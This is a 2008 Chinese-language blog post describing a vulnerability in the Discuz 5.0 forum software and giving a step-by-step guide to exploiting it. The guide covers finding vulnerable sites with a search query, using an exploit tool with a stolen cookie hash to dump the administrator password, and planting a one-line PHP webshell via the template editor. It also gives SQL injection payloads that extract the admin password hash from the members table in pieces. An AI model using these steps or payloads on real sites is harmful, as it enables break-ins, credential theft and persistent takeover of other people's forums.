本站公告

本站所發放的連結或檔案主程式均經防毒軟件檢測,未能通過檢測的主程式載點均不會發放。部份破解類文章附帶的Patch 可能會被部份防毒軟件測出病毒,此時請閣下自行決擇使用與否。

Creative Commons License
本 作品 係採用共享創意 署名-非商業性-相同方式共享 3.0 香港 授權條款授權.


2008年5月25日 星期日

Discuz 5.0 討論區漏洞

我最近瀏覽網站時,找到一個網誌說Discuz 5.0 的漏洞。

dz5最近出現了爆管理員密碼漏洞,問題出在pm.php,好友群發那裡.代碼如下:
3800hk

利用方法:
工具dz5.htm

1 在google裡輸入關鍵詞:Powered by Discuz! 5.0.0 搜索,找到入侵網站,也可以用網站獵手.
2 打開要入侵的網站,註冊一個用戶,登錄,在底部 清除 Cookies 處點右鍵,屬性,找到hash值,將其複製到利用工具裡hash裡,同時複製網址到工具url裡.
3查看右上角的會員 找到其版主的用戶名和id 把用戶名填到工具的msgto裡,修改 用ID值修改UID=1 中的1,點gogogo即可爆出密碼
3 找到成功利用可以爆出管理員密碼,登錄後台,然後在模版那裡,可以直接修改,選擇任一文件,插入lanke的php一句馬,用lanke 的客戶端連接,提交變量,成功會有環境變量的顯示,利用就成功了!



有時爆出的密碼只有15位,大家不會破解吧,那就按下面的方法就行啦!

15位有辦法解決的
你把SQL語句換一下啊
0) union select length(password),2,0 from cdb_members where uid=1/*
這句是得到MD5長度
0) union select left(password,15),2,0 from cdb_members where uid=1/*
這句得到MD5前15位
0) union select SUBSTRING(password,16,15),2,0 from cdb_members where uid=1/*
這句得到MD5 16-30位
0) union select right(password,2),2,0 from cdb_members where uid=1/*
這句得到MD5 31-32位
MD5一共是32位的

沒有留言: